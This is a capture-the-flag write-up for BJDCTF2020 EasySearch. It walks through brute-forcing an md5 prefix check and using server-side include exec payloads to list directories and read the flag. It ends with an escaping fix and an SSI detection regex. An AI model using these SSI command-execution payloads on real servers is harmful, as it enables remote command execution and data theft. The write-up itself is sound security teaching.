[BJDCTF2020]EasySearch
Scanning for the site's back-end files: scans on BUU often turn up nothing, so I gave up on that and just grabbed the path from an online write-up.
There is an /index.php.swp.
The source is as follows:
```php
<?php
ob_start();
function get_hash(){
    $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@   // rest of the character set is cut off in the recovered listing
    $random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
    $content = uniqid().$random;
    return sha1($content);
}
header("Content-Type: text/html;charset=utf-8");
***
if(isset($_POST['username']) and $_POST['username'] != '' ) {
    $admin = '6d0bc1';
    // only the first six hex characters of md5(password) are compared
    if ( $admin == substr(md5($_POST['password']),0,6)) {
        echo "<script>alert('[+] Welcome to manage system')</script>";
        $file_shtml = "public/".get_hash().".shtml";
        $shtml = fopen($file_shtml, "w") or die("Unable to open file!");   // line 17 of the original listing
        // the username is written into the .shtml file without any escaping
        $text = '
        ***
        ***
        <h1>Hello,'.$_POST['username'].'</h1>
        ***
        ***';
        fwrite($shtml,$text);
        fclose($shtml);
        ***
        echo "[!] Header error ...";
    } else {
        echo "<script>alert('[!] Failed')</script>";
    }
}else {
    ***
}
***
?>
```
The first six characters of the password's md5 digest must equal 6d0bc1.
A short script finds candidates:
```python
from hashlib import md5

# Search for an integer whose md5 hex digest starts with the six
# characters the back end compares against.
for i in range(10000000):
    if md5(str(i).encode('utf-8')).hexdigest()[:6] == '6d0bc1':
        print(i)
```
Pick any one, e.g. 2020666, which yields:
```
/public/6a55805e27f57db992ebd9b47735c84cb7ec8e91.shtml
```
At this point it looked most likely to be SSTI, but the captured traffic showed it was neither Python nor PHP, so I was stuck.
Only after reading a write-up did I learn it was shtml, which I had not come across before.
The source actually gives a small hint as well:
Line 17: `$shtml = fopen($file_shtml, "w") or die("Unable to open file!");`
So use the SSI payload directly. The flag is in the parent directory.
Payload:
```html
<!--#exec cmd="ls ../"-->
<!--#exec cmd="cat ../flag_990c66bf85a09c664f0b6741840499b2"-->
```
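The root cause is the unescaped `$_POST['username']` concatenated into a file that Apache's SSI handler will parse. The following is an added example, not code from the challenge or the write-up: it reproduces that embedding in Python, shows the hardened form (`html.escape`, the equivalent of PHP's `htmlspecialchars`, which turns `<` into `&lt;` so no directive can start), and runs a simple detector for Apache `mod_include` directive names over constructed POST bodies of the kind a WAF or log pipeline would see. The function names, the regex and the sample bodies are my own assumptions for illustration.

```python
import html
import re
from urllib.parse import parse_qsl

# Mirrors the challenge's vulnerable line: the username is concatenated into
# the .shtml file unescaped, so the server-side-include parser will act on it.
def render_unsafe(username: str) -> str:
    return "<h1>Hello," + username + "</h1>"

# Hardened form. html.escape() does what PHP's htmlspecialchars() does:
# '<' becomes '&lt;', so the text can no longer open an SSI directive
# when the .shtml file is served.
def render_safe(username: str) -> str:
    return "<h1>Hello," + html.escape(username, quote=True) + "</h1>"

# Apache SSI directives take the form <!--#name attr="value" -->.  The
# pattern is deliberately tolerant of whitespace so it also catches sloppy
# variants when used for detection over logs.
SSI_DIRECTIVE = re.compile(
    r"<!--\s*#\s*(exec|include|echo|set|config|printenv|fsize|flastmod)\b",
    re.IGNORECASE,
)

def find_ssi_directives(text: str) -> list:
    """Return the directive names (lower-cased) found in text, in order."""
    return [m.group(1).lower() for m in SSI_DIRECTIVE.finditer(text)]

# Constructed POST bodies (not real traffic), including the page's own exec
# payload, standing in for what the login endpoint would receive.
CONSTRUCTED_POST_BODIES = [
    "username=alice&password=2020666",
    'username=<!--#exec cmd="ls ../"-->&password=2020666',
    'username=<!--#echo var="DATE_LOCAL"-->&password=2020666',
]

def flag_requests(bodies):
    """Return (request_index, field, directive) for every SSI directive
    found in any form field of the given bodies."""
    hits = []
    for idx, body in enumerate(bodies):
        for field, value in parse_qsl(body, keep_blank_values=True):
            for directive in find_ssi_directives(value):
                hits.append((idx, field, directive))
    return hits

if __name__ == "__main__":
    payload = '<!--#exec cmd="ls ../"-->'
    print(render_unsafe(payload))   # directive survives intact
    print(render_safe(payload))     # &lt;!--#exec ... --&gt;
    print(flag_requests(CONSTRUCTED_POST_BODIES))
```

Escaping on output is the fix that matters here; a detector like `flag_requests` is only a second line of defence, since it can be bypassed by encodings the regex does not anticipate, and it says nothing about the other weakness on this page, the six-character md5 prefix comparison, which should be a full-hash comparison of a properly hashed password.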